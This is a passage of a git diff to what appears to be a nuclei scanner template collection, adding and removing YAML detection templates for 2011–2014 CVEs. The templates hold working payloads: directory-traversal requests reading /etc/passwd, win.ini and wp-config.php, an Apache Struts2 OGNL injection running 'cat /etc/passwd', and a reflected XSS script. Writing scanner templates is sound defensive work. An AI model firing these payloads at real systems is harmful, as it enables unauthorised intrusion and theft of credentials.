+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ''
+ part: body
+
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ part: header
+ words:
+ - text/html
diff --git a/nuclei-templates/CVE-2011/CVE-2011-5179.yaml b/nuclei-templates/CVE-2011/cve-2011-5179.yaml
similarity index 100%
rename from nuclei-templates/CVE-2011/CVE-2011-5179.yaml
rename to nuclei-templates/CVE-2011/cve-2011-5179.yaml
diff --git a/nuclei-templates/CVE-2012/CVE-2012-0991.yaml b/nuclei-templates/CVE-2012/CVE-2012-0991.yaml
deleted file mode 100644
index 3a27e8c3a6..0000000000
--- a/nuclei-templates/CVE-2012/CVE-2012-0991.yaml
+++ /dev/null
@@ -1,33 +0,0 @@
-id: CVE-2012-0991
-
-info:
- name: OpenEMR 4.1 - Local File Inclusion
- author: daffainfo
- severity: high
- description: Multiple directory traversal vulnerabilities in OpenEMR 4.1.0 allow remote authenticated users to read arbitrary files via a .. (dot dot) in the formname parameter to (1) contrib/acog/print_form.php; or (2) load_form.php, (3) view_form.php, or (4) trend_form.php in interface/patient_file/encounter.
- reference:
- - https://www.exploit-db.com/exploits/36650
- - https://www.cvedetails.com/cve/CVE-2012-0991
- - http://osvdb.org/78729
- - http://www.securityfocus.com/bid/51788
- classification:
- cve-id: CVE-2012-0991
- tags: cve,cve2012,lfi,openemr,traversal
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/contrib/acog/print_form.php?formname=../../../etc/passwd%00"
-
- matchers-condition: and
- matchers:
-
- - type: regex
- regex:
- - "root:.*:0:0:"
-
- - type: status
- status:
- - 200
-
-# Enhanced by mp on 2022/02/21
diff --git a/nuclei-templates/CVE-2012/CVE-2012-0996.yaml b/nuclei-templates/CVE-2012/CVE-2012-0996.yaml
new file mode 100644
index 0000000000..2d2791b54e
--- /dev/null
+++ b/nuclei-templates/CVE-2012/CVE-2012-0996.yaml
@@ -0,0 +1,33 @@
+id: CVE-2012-0996
+
+info:
+ name: 11in1 CMS 1.2.1 - Local File Inclusion (LFI)
+ author: daffainfo
+ severity: high
+ description: Multiple directory traversal vulnerabilities in 11in1 1.2.1 stable 12-31-2011 allow remote attackers to read arbitrary files via a .. (dot dot) in the class parameter to (1) index.php or (2) admin/index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/36784
+ - https://www.cvedetails.com/cve/CVE-2012-0996
+ - https://www.htbridge.ch/advisory/HTB23071
+ remediation: Upgrade to a supported version.
+ classification:
+ cve-id: CVE-2012-0996
+ tags: cve,cve2012,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?class=../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/02/18
diff --git a/nuclei-templates/CVE-2012/cve-2012-4242.yaml b/nuclei-templates/CVE-2012/CVE-2012-4242.yaml
similarity index 100%
rename from nuclei-templates/CVE-2012/cve-2012-4242.yaml
rename to nuclei-templates/CVE-2012/CVE-2012-4242.yaml
diff --git a/nuclei-templates/CVE-2012/CVE-2012-4253.yaml b/nuclei-templates/CVE-2012/CVE-2012-4253.yaml
new file mode 100644
index 0000000000..e9211386c2
--- /dev/null
+++ b/nuclei-templates/CVE-2012/CVE-2012-4253.yaml
@@ -0,0 +1,33 @@
+id: CVE-2012-4253
+
+info:
+ name: MySQLDumper 1.24.4 - Directory Traversal
+ author: daffainfo
+ severity: high
+ description: Multiple directory traversal vulnerabilities in MySQLDumper 1.24.4 allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) language parameter to learn/cubemail/install.php or (2) f parameter learn/cubemail/filemanagement.php, or execute arbitrary local files via a .. (dot dot) in the (3) config parameter to learn/cubemail/menu.php.
+ reference:
+ - https://www.exploit-db.com/exploits/37129
+ - https://www.cvedetails.com/cve/CVE-2012-4253
+ - http://www.osvdb.org/81609
+ - http://www.osvdb.org/81615
+ classification:
+ cve-id: CVE-2012-4253
+ tags: cve,cve2012,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/learn/cubemail/filemanagement.php?action=dl&f=../../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/02/21
diff --git a/nuclei-templates/CVE-2012/cve-2012-4273.yaml b/nuclei-templates/CVE-2012/CVE-2012-4273.yaml
similarity index 100%
rename from nuclei-templates/CVE-2012/cve-2012-4273.yaml
rename to nuclei-templates/CVE-2012/CVE-2012-4273.yaml
diff --git a/nuclei-templates/CVE-2012/CVE-2012-4878.yaml b/nuclei-templates/CVE-2012/CVE-2012-4878.yaml
deleted file mode 100644
index 1e1bfafaff..0000000000
--- a/nuclei-templates/CVE-2012/CVE-2012-4878.yaml
+++ /dev/null
@@ -1,33 +0,0 @@
-id: CVE-2012-4878
-
-info:
- name: FlatnuX CMS - Directory Traversal
- author: daffainfo
- severity: high
- description: A path traversal vulnerability in controlcenter.php in FlatnuX CMS 2011 08.09.2 allows remote administrators to read arbitrary files via a full pathname in the dir parameter in a contents/Files action.
- reference:
- - https://www.exploit-db.com/exploits/37034
- - https://www.cvedetails.com/cve/CVE-2012-4878
- - http://www.vulnerability-lab.com/get_content.php?id=487
- - http://packetstormsecurity.org/files/111473/Flatnux-CMS-2011-08.09.2-CSRF-XSS-Directory-Traversal.html
- classification:
- cve-id: CVE-2012-4878
- tags: cve,cve2012,lfi,traversal
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/controlcenter.php?opt=contents/Files&dir=%2Fetc&ffile=passwd&opmod=open"
-
- matchers-condition: and
- matchers:
-
- - type: regex
- regex:
- - "root:.*:0:0:"
-
- - type: status
- status:
- - 200
-
-# Enhanced by mp on 2022/02/21
diff --git a/nuclei-templates/CVE-2012/CVE-2012-4940.yaml b/nuclei-templates/CVE-2012/CVE-2012-4940.yaml
new file mode 100644
index 0000000000..ea6daf7459
--- /dev/null
+++ b/nuclei-templates/CVE-2012/CVE-2012-4940.yaml
@@ -0,0 +1,33 @@
+id: CVE-2012-4940
+
+info:
+ name: Axigen Mail Server Filename Directory Traversal
+ author: dhiyaneshDk
+ severity: high
+ description: Multiple directory traversal vulnerabilities in the View Log Files component in Axigen Free Mail Server allow remote attackers to read or delete arbitrary files via a .. (dot dot) in the fileName parameter in a download action to source/loggin/page_log_dwn_file.hsp, or the fileName parameter in an edit or delete action to the default URI.
+ reference:
+ - https://www.exploit-db.com/exploits/37996
+ - https://nvd.nist.gov/vuln/detail/CVE-2012-4940
+ - http://www.kb.cert.org/vuls/id/586556
+ - http://www.securityfocus.com/bid/56343
+ classification:
+ cve-id: CVE-2012-4940
+ tags: cve,cve2012,axigen,lfi,mail
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/?h=44ea8a6603cbf54e245f37b4ddaf8f36&page=vlf&action=edit&fileName=..\..\..\windows\win.ini'
+ - '{{BaseURL}}/source/loggin/page_log_dwn_file.hsp?h=44ea8a6603cbf54e245f37b4ddaf8f36&action=download&fileName=..\..\..\windows\win.ini'
+
+ stop-at-first-match: true
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "bit app support"
+ - "fonts"
+ - "extensions"
+ condition: and
+
+# Enhanced by cs on 2022/02/25
diff --git a/nuclei-templates/CVE-2012/cve-2012-0991.yaml b/nuclei-templates/CVE-2012/cve-2012-0991.yaml
new file mode 100644
index 0000000000..c9bbdc69ff
--- /dev/null
+++ b/nuclei-templates/CVE-2012/cve-2012-0991.yaml
@@ -0,0 +1,27 @@
+id: CVE-2012-0991
+
+info:
+ name: OpenEMR 4.1 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Multiple directory traversal vulnerabilities in OpenEMR 4.1.0 allow remote authenticated users to read arbitrary files via a .. (dot dot) in the formname parameter to (1) contrib/acog/print_form.php; or (2) load_form.php, (3) view_form.php, or (4) trend_form.php in interface/patient_file/encounter.
+ reference:
+ - https://www.exploit-db.com/exploits/36650
+ - https://www.cvedetails.com/cve/CVE-2012-0991
+ tags: cve,cve2012,lfi,openemr,traversal
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/contrib/acog/print_form.php?formname=../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/CVE-2012/cve-2012-0996.yaml b/nuclei-templates/CVE-2012/cve-2012-0996.yaml
deleted file mode 100644
index b096e5a0ba..0000000000
--- a/nuclei-templates/CVE-2012/cve-2012-0996.yaml
+++ /dev/null
@@ -1,27 +0,0 @@
-id: CVE-2012-0996
-
-info:
- name: 11in1 CMS 1.2.1 - Local File Inclusion (LFI)
- author: daffainfo
- severity: high
- description: Multiple directory traversal vulnerabilities in 11in1 1.2.1 stable 12-31-2011 allow remote attackers to read arbitrary files via a .. (dot dot) in the class parameter to (1) index.php or (2) admin/index.php.
- reference:
- - https://www.exploit-db.com/exploits/36784
- - https://www.cvedetails.com/cve/CVE-2012-0996
- tags: cve,cve2012,lfi
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/index.php?class=../../../../../../../etc/passwd%00"
-
- matchers-condition: and
- matchers:
-
- - type: regex
- regex:
- - "root:.*:0:0"
-
- - type: status
- status:
- - 200
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2012/CVE-2012-1835.yaml b/nuclei-templates/CVE-2012/cve-2012-1835.yaml
similarity index 100%
rename from nuclei-templates/CVE-2012/CVE-2012-1835.yaml
rename to nuclei-templates/CVE-2012/cve-2012-1835.yaml
diff --git a/nuclei-templates/CVE-2012/CVE-2012-2371.yaml b/nuclei-templates/CVE-2012/cve-2012-2371.yaml
similarity index 100%
rename from nuclei-templates/CVE-2012/CVE-2012-2371.yaml
rename to nuclei-templates/CVE-2012/cve-2012-2371.yaml
diff --git a/nuclei-templates/CVE-2012/cve-2012-4253.yaml b/nuclei-templates/CVE-2012/cve-2012-4253.yaml
deleted file mode 100644
index 7bc7888e98..0000000000
--- a/nuclei-templates/CVE-2012/cve-2012-4253.yaml
+++ /dev/null
@@ -1,27 +0,0 @@
-id: CVE-2012-4253
-
-info:
- name: MySQLDumper 1.24.4 - Directory Traversal
- author: daffainfo
- severity: high
- description: Multiple directory traversal vulnerabilities in MySQLDumper 1.24.4 allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) language parameter to learn/cubemail/install.php or (2) f parameter learn/cubemail/filemanagement.php, or execute arbitrary local files via a .. (dot dot) in the (3) config parameter to learn/cubemail/menu.php.
- reference:
- - https://www.exploit-db.com/exploits/37129
- - https://www.cvedetails.com/cve/CVE-2012-4253
- tags: cve,cve2012,lfi
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/learn/cubemail/filemanagement.php?action=dl&f=../../../../../../../../../../../etc/passwd%00"
-
- matchers-condition: and
- matchers:
-
- - type: regex
- regex:
- - "root:.*:0:0"
-
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/CVE-2012/cve-2012-4878.yaml b/nuclei-templates/CVE-2012/cve-2012-4878.yaml
new file mode 100644
index 0000000000..c50f80c82b
--- /dev/null
+++ b/nuclei-templates/CVE-2012/cve-2012-4878.yaml
@@ -0,0 +1,27 @@
+id: CVE-2012-4878
+
+info:
+ name: FlatnuX CMS - Directory Traversal
+ author: daffainfo
+ severity: high
+ description: Path traversal vulnerability in controlcenter.php in FlatnuX CMS 2011 08.09.2 allows remote administrators to read arbitrary files via a full pathname in the dir parameter in a contents/Files action.
+ reference:
+ - https://www.exploit-db.com/exploits/37034
+ - https://www.cvedetails.com/cve/CVE-2012-4878
+ tags: cve,cve2012,lfi,traversal
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/controlcenter.php?opt=contents/Files&dir=%2Fetc&ffile=passwd&opmod=open"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/CVE-2012/cve-2012-4940.yaml b/nuclei-templates/CVE-2012/cve-2012-4940.yaml
deleted file mode 100644
index 6e9ed3f4d9..0000000000
--- a/nuclei-templates/CVE-2012/cve-2012-4940.yaml
+++ /dev/null
@@ -1,25 +0,0 @@
-id: CVE-2012-4940
-
-info:
- name: Axigen Mail Server - 'Filename' Directory Traversal
- author: dhiyaneshDk
- severity: high
- description: Multiple directory traversal vulnerabilities in the View Log Files component in Axigen Free Mail Server allow remote attackers to read or delete arbitrary files via a .. (dot dot) in (1) the fileName parameter in a download action to source/loggin/page_log_dwn_file.hsp, or the fileName parameter in (2) an edit action or (3) a delete action to the default URI.
- reference: https://www.exploit-db.com/exploits/37996
- tags: cve,cve2012,axigen,lfi,mail
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/?h=44ea8a6603cbf54e245f37b4ddaf8f36&page=vlf&action=edit&fileName=..\..\..\windows\win.ini'
- - '{{BaseURL}}/source/loggin/page_log_dwn_file.hsp?h=44ea8a6603cbf54e245f37b4ddaf8f36&action=download&fileName=..\..\..\windows\win.ini'
-
- stop-at-first-match: true
- matchers:
- - type: word
- part: body
- words:
- - "bit app support"
- - "fonts"
- - "extensions"
- condition: and
diff --git a/nuclei-templates/CVE-2013/CVE-2013-1965.yaml b/nuclei-templates/CVE-2013/CVE-2013-1965.yaml
new file mode 100644
index 0000000000..35c1132f3e
--- /dev/null
+++ b/nuclei-templates/CVE-2013/CVE-2013-1965.yaml
@@ -0,0 +1,42 @@
+id: CVE-2013-1965
+
+info:
+ name: Apache Struts2 S2-012 RCE
+ author: pikpikcu
+ severity: critical
+ description: Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.3, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled when invoking a redirect.
+ reference:
+ - http://struts.apache.org/development/2.x/docs/s2-012.html
+ - https://nvd.nist.gov/vuln/detail/CVE-2013-1965
+ - https://bugzilla.redhat.com/show_bug.cgi?id=967655
+ remediation: Developers should immediately upgrade to Struts 2.3.14.3 or later.
+ classification:
+ cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:C/I:C/A:C
+ cve-id: CVE-2013-1965
+ cwe-id: CWE-94
+ cvss-score: 9.3
+ tags: cve,cve2013,apache,rce,struts,ognl
+ metadata:
+ max-request: 1
+
+http:
+ - method: POST
+ path:
+ - "{{BaseURL}}/user.action"
+ headers:
+ Content-Type: application/x-www-form-urlencoded
+ body: |
+ name=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C+%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/02/21
diff --git a/nuclei-templates/CVE-2013/cve-2013-2248.yaml b/nuclei-templates/CVE-2013/CVE-2013-2248.yaml
similarity index 100%
rename from nuclei-templates/CVE-2013/cve-2013-2248.yaml
rename to nuclei-templates/CVE-2013/CVE-2013-2248.yaml
diff --git a/nuclei-templates/CVE-2013/CVE-2013-5528.yaml b/nuclei-templates/CVE-2013/CVE-2013-5528.yaml
deleted file mode 100644
index c6a9f04a15..0000000000
--- a/nuclei-templates/CVE-2013/CVE-2013-5528.yaml
+++ /dev/null
@@ -1,33 +0,0 @@
-id: CVE-2013-5528
-
-info:
- name: Cisco Unified Communications Manager 7/8/9 - Directory Traversal
- author: daffainfo
- severity: high
- description: A directory traversal vulnerability in the Tomcat administrative web interface in Cisco Unified Communications Manager allows remote authenticated users to read arbitrary files via directory traversal sequences in an unspecified input string, aka Bug ID CSCui78815
- reference:
- - https://www.exploit-db.com/exploits/40887
- - https://nvd.nist.gov/vuln/detail/CVE-2014-3120
- - http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013-5528
- - http://www.securityfocus.com/bid/62960
- classification:
- cve-id: CVE-2013-5528
- tags: cve,cve2013,lfi,cisco
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/ccmadmin/bulkvivewfilecontents.do?filetype=samplefile&fileName=../../../../../../../../../../../../../../../../etc/passwd"
-
- matchers-condition: and
- matchers:
-
- - type: regex
- regex:
- - "root:.*:0:0:"
-
- - type: status
- status:
- - 200
-
-# Enhanced by mp on 2022/02/24
diff --git a/nuclei-templates/CVE-2013/CVE-2013-6281.yaml b/nuclei-templates/CVE-2013/CVE-2013-6281.yaml
deleted file mode 100644
index d08cfdb755..0000000000
--- a/nuclei-templates/CVE-2013/CVE-2013-6281.yaml
+++ /dev/null
@@ -1,41 +0,0 @@
-id: CVE-2013-6281
-info:
- name: WordPress Spreadsheet - dhtmlxspreadsheet Plugin Reflected XSS
- author: random-robbie
- severity: medium
- description: |
- The dhtmlxspreadsheet WordPress plugin was affected by a /dhtmlxspreadsheet/codebase/spreadsheet.php page Parameter Reflected XSS security vulnerability.
- reference:
- - https://wpscan.com/vulnerability/49785932-f4e0-4aaa-a86c-4017890227bf
- - http://web.archive.org/web/20210213174519/https://www.securityfocus.com/bid/63256/
- - https://wordpress.org/plugins/dhtmlxspreadsheet/
- - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6281
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- cvss-score: 6.1
- cve-id: CVE-2013-6281
- cwe-id: CWE-79
- metadata:
- google-dork: inurl:/wp-content/plugins/dhtmlxspreadsheet
- verified: "true"
- tags: cve,cve2013,wordpress,xss,wp-plugin,wp
-requests:
- - raw:
- - |
- GET /wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
- Host: {{Hostname}}
- matchers-condition: and
- matchers:
- - type: word
- part: body
- words:
- - "page: ''"
- - "dhx_rel_path"
- condition: and
- - type: word
- part: header
- words:
- - text/html
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/CVE-2013/CVE-2013-7240.yaml b/nuclei-templates/CVE-2013/CVE-2013-7240.yaml
new file mode 100644
index 0000000000..6ad0335e9a
--- /dev/null
+++ b/nuclei-templates/CVE-2013/CVE-2013-7240.yaml
@@ -0,0 +1,40 @@
+id: CVE-2013-7240
+
+info:
+ name: WordPress Plugin Advanced Dewplayer 1.2 - Directory Traversal
+ author: daffainfo
+ severity: high
+ description: A directory traversal vulnerability in download-file.php in the Advanced Dewplayer plugin 1.2 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the dew_file parameter.
+ reference:
+ - https://www.exploit-db.com/exploits/38936
+ - https://nvd.nist.gov/vuln/detail/CVE-2013-7240
+ - https://wordpress.org/support/topic/security-vulnerability-cve-2013-7240-directory-traversal/
+ - http://seclists.org/oss-sec/2013/q4/570
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2013-7240
+ cwe-id: CWE-22
+ tags: cve,cve2013,wordpress,wp-plugin,lfi
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "DB_NAME"
+ - "DB_PASSWORD"
+ - "DB_HOST"
+ - "The base configurations of the WordPress"
+ part: body
+ condition: and
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/02/24
diff --git a/nuclei-templates/CVE-2013/cve-2013-1965.yaml b/nuclei-templates/CVE-2013/cve-2013-1965.yaml
deleted file mode 100644
index b6b996e988..0000000000
--- a/nuclei-templates/CVE-2013/cve-2013-1965.yaml
+++ /dev/null
@@ -1,29 +0,0 @@
-id: CVE-2013-1965
-
-info:
- name: Apache Struts2 S2-012 RCE
- author: pikpikcu
- severity: critical
- description: Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.3, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled when invoking a redirect.
- reference: http://struts.apache.org/development/2.x/docs/s2-012.html
- tags: cve,cve2013,apache,rce,struts,ognl
-
-requests:
- - method: POST
- path:
- - "{{BaseURL}}/user.action"
- headers:
- Content-Type: application/x-www-form-urlencoded
- body: |
- name=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C+%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D
-
- matchers-condition: and
- matchers:
-
- - type: regex
- regex:
- - "root:.*:0:0"
-
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/CVE-2013/CVE-2013-3526.yaml b/nuclei-templates/CVE-2013/cve-2013-3526.yaml
similarity index 100%
rename from nuclei-templates/CVE-2013/CVE-2013-3526.yaml
rename to nuclei-templates/CVE-2013/cve-2013-3526.yaml
diff --git a/nuclei-templates/CVE-2013/CVE-2013-3827.yaml b/nuclei-templates/CVE-2013/cve-2013-3827.yaml
similarity index 100%
rename from nuclei-templates/CVE-2013/CVE-2013-3827.yaml
rename to nuclei-templates/CVE-2013/cve-2013-3827.yaml
diff --git a/nuclei-templates/CVE-2013/cve-2013-5528.yaml b/nuclei-templates/CVE-2013/cve-2013-5528.yaml
new file mode 100644
index 0000000000..aae2a740e1
--- /dev/null
+++ b/nuclei-templates/CVE-2013/cve-2013-5528.yaml
@@ -0,0 +1,25 @@
+id: CVE-2013-5528
+
+info:
+ name: Cisco Unified Communications Manager 7/8/9 - Directory Traversal
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the Tomcat administrative web interface in Cisco Unified Communications Manager allows remote authenticated users to read arbitrary files via directory traversal sequences in an unspecified input string, aka Bug ID CSCui78815
+ reference: https://www.exploit-db.com/exploits/40887
+ tags: cve,cve2013,lfi,cisco
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/ccmadmin/bulkvivewfilecontents.do?filetype=samplefile&fileName=../../../../../../../../../../../../../../../../etc/passwd"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/CVE-2013/cve-2013-6281.yaml b/nuclei-templates/CVE-2013/cve-2013-6281.yaml
new file mode 100644
index 0000000000..255fd4324b
--- /dev/null
+++ b/nuclei-templates/CVE-2013/cve-2013-6281.yaml
@@ -0,0 +1,59 @@
+id: CVE-2013-6281
+
+info:
+ name: WordPress Spreadsheet - Cross-Site Scripting
+ author: random-robbie
+ severity: medium
+ description: |
+ WordPress Spreadsheet plugin contains a reflected cross-site scripting vulnerability in /dhtmlxspreadsheet/codebase/spreadsheet.php.
+ impact: |
+ Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected WordPress site, leading to potential data theft, session hijacking, or defacement.
+ remediation: |
+ Update the WordPress Spreadsheet plugin to the latest version, which includes proper input sanitization to mitigate the XSS vulnerability.
+ reference:
+ - https://wpscan.com/vulnerability/49785932-f4e0-4aaa-a86c-4017890227bf
+ - https://wordpress.org/plugins/dhtmlxspreadsheet/
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6281
+ - https://nvd.nist.gov/vuln/detail/CVE-2013-6281
+ - https://github.com/ARPSyndicate/kenzer-templates
+ classification:
+ cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2013-6281
+ cwe-id: CWE-79
+ epss-score: 0.00327
+ epss-percentile: 0.70301
+ cpe: cpe:2.3:a:dhtmlx:dhtmlxspreadsheet:2.0:-:*:*:*:wordpress:*:*
+ metadata:
+ verified: true
+ max-request: 1
+ vendor: dhtmlx
+ product: dhtmlxspreadsheet
+ framework: wordpress
+ google-query: inurl:/wp-content/plugins/dhtmlxspreadsheet
+ tags: cve2013,cve,wp,wpscan,wordpress,xss,wp-plugin,dhtmlx
+
+http:
+ - raw:
+ - |
+ GET /wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "page: ''"
+ - "dhx_rel_path"
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
+# digest: 4a0a00473045022079dad5452b1c88999fef931cbe9ebdc94b286f675f074daceba867d5b3c98f690221008f233d1dbd073f71171ad3756acc9a91929c93719348f87c26e4c5ba95c7b43e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2013/cve-2013-7240.yaml b/nuclei-templates/CVE-2013/cve-2013-7240.yaml
deleted file mode 100644
index 2b8df419a9..0000000000
--- a/nuclei-templates/CVE-2013/cve-2013-7240.yaml
+++ /dev/null
@@ -1,36 +0,0 @@
-id: CVE-2013-7240
-
-info:
- name: WordPress Plugin Advanced Dewplayer 1.2 - Directory Traversal
- author: daffainfo
- severity: high
- description: Directory traversal vulnerability in download-file.php in the Advanced Dewplayer plugin 1.2 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the dew_file parameter.
- reference:
- - https://www.exploit-db.com/exploits/38936
- - https://nvd.nist.gov/vuln/detail/CVE-2013-7240
- tags: cve,cve2013,wordpress,wp-plugin,lfi
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- cvss-score: 7.5
- cve-id: CVE-2013-7240
- cwe-id: CWE-22
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php'
-
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "DB_NAME"
- - "DB_PASSWORD"
- - "DB_HOST"
- - "The base configurations of the WordPress"
- part: body
- condition: and
-
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/CVE-2014/CVE-2014-10037.yaml b/nuclei-templates/CVE-2014/CVE-2014-10037.yaml
deleted file mode 100644
index 35aa39b4b4..0000000000
--- a/nuclei-templates/CVE-2014/CVE-2014-10037.yaml
+++ /dev/null
@@ -1,33 +0,0 @@
-id: CVE-2014-10037
-
-info:
- name: DomPHP 0.83 - Directory Traversal
- author: daffainfo
- severity: high
- description: A directory traversal vulnerability in DomPHP 0.83 and earlier allows remote attackers to have unspecified impacts via a .. (dot dot) in the url parameter to photoalbum/index.php.
- reference:
- - https://www.exploit-db.com/exploits/30865
- - https://www.cvedetails.com/cve/CVE-2014-10037
- - https://nvd.nist.gov/vuln/detail/CVE-2014-10037
- - http://osvdb.org/show/osvdb/102204
- classification:
- cve-id: CVE-2014-10037
- tags: cve,cve2014,lfi
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/photoalbum/index.php?urlancien=&url=../../../../../../../../../../../../etc/passwd%00"
-
- matchers-condition: and
- matchers:
-
- - type: regex
- regex:
- - "root:.*:0:0:"
-
- - type: status
- status:
- - 200
-
-# Enhanced by mp on 2022/02/24
diff --git a/nuclei-templates/CVE-2014/CVE-2014-2383.yaml b/nuclei-templates/CVE-2014/CVE-2014-2383.yaml
new file mode 100644
index 0000000000..bb404d9069
--- /dev/null
+++ b/nuclei-templates/CVE-2014/CVE-2014-2383.yaml
@@ -0,0 +1,42 @@
+id: CVE-2014-2383
+
+info:
+ name: Arbitrary file read in dompdf < v0.6.0
+ author: 0x_Akoko
+ severity: high
+ description: A vulnerability in dompdf.php in dompdf before 0.6.1, when DOMPDF_ENABLE_PHP is enabled, allows context-dependent attackers to bypass chroot protections and read arbitrary files via a PHP protocol and wrappers in the input_file parameter, as demonstrated by a php://filter/read=convert.base64-encode/resource in the input_file parameter.
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2014-2383
+ - https://www.exploit-db.com/exploits/33004
+ - http://seclists.org/fulldisclosure/2014/Apr/258
+ - https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2383/
+ classification:
+ cve-id: CVE-2014-2383
+ metadata:
+ unix-payload: /dompdf.php?input_file=/etc/passwd
+ win-payload: /dompdf.php?input_file=C:/windows/win.ini
+ tags: cve,cve2014,dompdf,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/dompdf.php?input_file=dompdf.php"
